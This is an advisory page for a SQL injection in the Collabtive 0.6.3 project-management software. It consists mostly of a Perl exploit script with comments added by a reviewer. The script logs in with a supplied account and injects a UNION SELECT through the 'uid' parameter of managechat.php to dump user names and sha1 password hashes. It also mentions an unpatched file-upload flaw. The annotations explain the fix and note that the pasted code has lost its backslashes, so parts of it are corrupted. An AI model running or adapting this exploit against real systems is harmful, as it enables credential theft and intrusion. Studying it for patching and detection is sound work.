Collabtive 0.6.3 remote SQL injection

2010.06.15
Credit: DNX
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Cookies;
use Getopt::Long;
#
# Proof-of-concept for the authenticated SQL injection in Collabtive 0.6.3
# described in the header below (CWE-89): the "uid" query parameter of
# managechat.php is interpolated unquoted into the SELECT on its line 64, so
# a logged-in user can alter the query.  The script logs in with the supplied
# account, issues one crafted GET and prints the rows it gets back.
#
# Root cause / fix (application side): cast $userto_id to an integer, or bind
# it as a query parameter, instead of interpolating it into the SQL string.
# The request shape this script sends ("uid=" followed by a closing paren and
# "union select") is also what a request-log search or WAF rule would match.
#
# NOTE(review): as pasted, the script has lost backslashes -- the "n" at the
# start of the print strings was almost certainly "\n", GetOptions(%options,
# ...) was almost certainly GetOptions(\%options, ...), and the "</b>" in the
# final regex was almost certainly "<\/b>".  The code is kept byte-for-byte
# as found; only comments have been added.  It also runs without
# "use strict" / "use warnings".
#
#'#/
# (-.-)
# ------------------oOO---(_)---OOo-----------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ / / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/__/__,_/_/ /_.___/__,_/__, /____/ |
# | Security Research Division /____/ 2o1o |
# --------------------------------------------------
# | Collabtive v0.6.3 Multiple Vulnerabilities |
# --------------------------------------------------
# [!] Discovered by.: DNX
# [!] Homepage......: http://starbugs.host.sk
# [!] Vendor........: http://collabtive.o-dyn.de
# [!] Detected......: 04.06.2010
# [!] Reported......: 05.06.2010
# [!] Response......: xx.xx.2010
#
# [!] Background....: Collabtive is web-based project management software.
#                     The project started in November 2007. It is open-source
#                     software and an alternative to proprietary tools such as
#                     Basecamp. Collabtive is written in PHP.
#
#                     Collabtive is developed by a professional team.
#
# [!] Requirements..: Account needed
#
# [!] Bug...........: $_GET['uid'] in managechat.php near line 64
#
# 12: $userto_id = getArrayVal($_GET, "uid");
#
# 64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC");
#
# The password is encoded with sha1.
#
# [!] Bug...........: The arbitrary file upload discovered by USH is still present.
# See http://www.milw0rm.com/exploits/7076 more details.
#

# Usage banner: shown unless at least six positional words were given
# (host, path and two "-opt value" pairs).  This tests raw @ARGV before
# GetOptions has consumed the options, so it is a word count, not a check
# that -user/-pass were actually supplied.
if(!$ARGV[5]) {
    print "n \#'#/ ";
    print "n (-.-) ";
    print "n ---------------oOO---(_)---OOo---------------";
    print "n | Collabtive v0.6.3 SQL Injection Exploit |";
    print "n | coded by DNX |";
    print "n ---------------------------------------------";
    print "n[!] Usage: perl collabtive.pl [Host] [Path] <Options>";
    print "n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345";
    print "n[!] Options:";
    print "n -user [text] Username";
    print "n -pass [text] Password";
    print "n -p [ip:port] Proxy support";
    print "n";
    exit;
}

# Option parsing.  NOTE(review): with the backslash lost, %options is
# flattened into the argument list here and never filled -- see header note.
my %options = ();
GetOptions(%options, "user=s", "pass=s", "p=s");

# One user agent and one cookie jar are shared with exploit() via closure.
my $ua = LWP::UserAgent->new();
my $cookie = HTTP::Cookies->new();

# $target is built by plain concatenation: no scheme check on $host and no
# slash normalisation, so $path must end in "/" as in the usage example.
my $host = $ARGV[0];
my $path = $ARGV[1];
my $target = "http://".$host.$path;
my $user = "";
my $pass = "";

# Only the http scheme is routed through the optional proxy.
if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
if($options{"user"}) { $user = $options{"user"}; }
if($options{"pass"}) { $pass = $options{"pass"}; }

print "[!] Exploiting...nn";
exploit();
print "n[!] Donen";

# exploit(): log in with the configured account, then send the single crafted
# request and print whatever "<b>label:</b> value" lines come back.
# Reads the file-scope $ua, $cookie, $target, $user and $pass; returns nothing
# useful (the value of the last foreach).
sub exploit {
    ##############
    # make login #
    ##############
    # Form POST to the login action.  The response status is never checked,
    # so a failed login is not detected here; whatever cookies the server
    # set are copied into the jar and the jar is attached to the agent.
    my $url = $target."manageuser.php?action=login";
    my $res = $ua->post($url, [username => $user, pass => $pass]);
    $cookie->extract_cookies($res);
    $ua->cookie_jar($cookie);

    ############################
    # get users with passwords #
    ############################
    # The injected value closes the IN(...) list that line 64 of managechat.php
    # builds around the unquoted uid and appends a UNION over the user table;
    # the trailing "/*" comments out the rest of the original query.  The
    # "pass" column holds sha1 values according to the header above.
    $url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*";
    $res = $ua->get($url);
    my $content = $res->content;

    # The chat view renders one entry per "<br />"; each entry is expected as
    # "<b>name:</b> value".  NOTE(review): the unescaped "/" inside the
    # pattern ends the regex early as pasted (see header note).
    my @c = split(/<br />/, $content);
    foreach (@c) {
        if($_ =~ /<b>(.*?):</b> (.*)/) {
            print $1.":".$2."n";
        }
    }
}




 

